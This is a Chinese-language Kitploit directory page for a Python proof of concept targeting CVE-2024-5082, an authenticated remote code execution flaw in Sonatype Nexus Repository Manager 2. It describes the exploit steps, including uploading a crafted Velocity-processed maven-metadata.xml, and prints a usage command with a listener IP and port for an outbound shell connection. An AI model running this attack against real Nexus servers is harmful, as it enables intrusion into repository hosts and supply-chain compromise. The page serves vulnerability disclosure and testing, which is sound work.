Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-5082 — Sonatype Nexus 2 - 已授权RCE POC | Kitploit
工具/GitHubGitHub/h4mr3r/cve-2024-5082
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试供应链安全Payload 开发
GitHubh4mr3r/cve-2024-5082

CVE-2024-5082

Sonatype Nexus 2 - 已授权RCE POC

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

概述

此仓库包含 CVE-2024-5082 的 Python 概念验证代码,这是 Sonatype Nexus Repository Manager 2 中的一个远程代码执行漏洞。

该漏洞允许具有足够权限的用户发布特制的 Maven 工件,并将其标记为由 Velocity 内容生成器处理。当检索该工件时,Velocity 模板会被 Nexus 解析,并可能在 Nexus JVM 的安全上下文中执行命令。

根据 Sonatype 的说法:

  • 受影响版本包括 Nexus Repository Manager 2.x 至 2.15.1;
  • 该问题已在 2.15.2 中修复;
  • Nexus Repository 2 已于 2025 年 6 月 30 日 生命周期终止,应迁移到 Nexus Repository 3。

重要范围澄清

命令是在 Nexus Repository 主机 上执行的。

从构建服务器、应用服务器或开发者工作站下载受影响的工件本身不会在消费端系统上执行嵌入的命令。然而,如果攻击者后来修改了受信任的工件、构建输入、凭据或仓库配置,则仓库管理器被攻破可能会造成更广泛的供应链风险。

PoC 的工作原理

该脚本:

  1. 在 Maven 式命名空间下生成一个唯一的标记路径。
  2. 将精心构造的 maven-metadata.xml 文件上传到选定的托管仓库。
  3. 更新相应的 Nexus 属性,将内容生成器设置为 velocity。
  4. 检索上传的工件,使 Nexus 处理该模板。
  5. 在清理过程中尝试移除上传的标记工件。

提供的 payload 将从 Nexus 主机向配置的监听器地址发起出站 TCP 连接。

身份验证与权限

当前脚本使用 HTTP 基本身份验证,并且需要:

  • 有效的 Nexus 用户名和密码;
  • 在选定仓库中创建或更新内容的权限;
  • PoC 使用的属性更新权限。

使用方法

root@kitploit:~
python3 cve_2024_5082.py \\
  --base-url https://nexus.example.test/nexus \\
  --repository security-test-snapshots \\
  --username test-user \\
  --password 'REDACTED' \\
  --lhost LISTENER_IP \\
  --lport 8000
下载工具